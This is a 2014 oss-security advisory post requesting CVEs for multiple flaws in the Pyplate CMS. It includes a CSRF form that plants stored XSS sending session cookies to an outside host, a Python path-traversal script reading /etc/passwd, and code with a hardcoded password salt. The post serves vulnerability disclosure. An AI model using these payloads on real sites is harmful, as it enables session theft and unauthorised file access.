Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30739
HistoryMay 15, 2014 - 12:00 a.m.

[oss-security] CVE request: Pyplate multiple vulnerabilities

2014-05-1500:00:00
vulners.com
22

Hello list,

My friend Teemu V. "requested" security audit for Pyplate. While quickly
checking quality of this software I noticed following issues. This is not a full
security audit as I don't have much free time.

Tested version: v0.08 (still beta)
Vendor notification: 2014-05-13

Issue 1.

Installation instruction tells user to execute following commands without
checking any checksums or similar:

> wget http://pyplate.com/pyplate_install.sh
> chmod +x ./pyplate_install.sh
> sudo ./pyplate_install.sh

Issue 2.

File /usr/lib/cgi-bin/create_passwd_file.py creates passwd.db for admin user
password with world readable permissions. I like that salt :]

20 salt="bla"
21
22 hash=crypt.crypt(random_string,'$6$'+salt+'$')
23 usercredentials="admin:"+hash
24
25 passwdf=open("./passwd.db",'w')
26 passwdf.write(usercredentials)
27 passwdf.close()

-rw-r–r-- 1 www-data www-data 99 May 13 20:45 /usr/share/pyplate/passwd.db

Issue 3.

Application is not using HttpOnly (nor Secure) flag in cookie "id".

Issue 4.

CSRF + XSS with cookie stealing PoC:

<html>
<body>
<form action="http://example.com/admin/addScript.py&quot; method="POST">
<input type="hidden" name="title" value="&lt;script&gt;new Image().src=&quot;http://bugs.fi/evil.py?cookie=&quot; encodeURI(document.cookie);&lt;/script&gt;" />
<input type="hidden" name="file" value="bugs" />
<input type="hidden" name="category" value="/" />
<input type="hidden" name="post" value="&lt;p&gt;bugs&lt;/p&gt; " />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="state" value="new" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

There is no CSRF protection and most of admin functionality contain stored XSS
issues.

Issue 5.

File /usr/lib/cgi-bin/download.py is used to download backup file from
installation after admin has created it in web-ui. Note the comment.

21 # need to check that the filename doesn't contain slashes
26 path = pyplate.getCMSRoot() + "/backup/" + filename
27 file = open (path, 'rb')

Normally HTTP POST message looks like:

"""
POST /cgi-bin/download.py HTTP/1.1
Host: 10.0.0.53
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.53/admin/manage_backups.py
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

filename=backup_2014.05.13.223720.tar.gz
"""

Attacker can use this without authentication to download arbitrary files from
the system. File needs to be readable by web server process. PoC for /etc/passwd
below:

"""
#!/usr/bin/env python

-- coding: utf-8 --

import requests
payload = {'filename': '…/…/…/…/etc/passwd'}
r = requests.post('http://example.org/cgi-bin/download.py&#39;,
data=payload)
print r.text
"""

If author responds with fixed in version I can coordinate this and send email to
abuse@ address for all users (which is not that many currently).


Henri Salo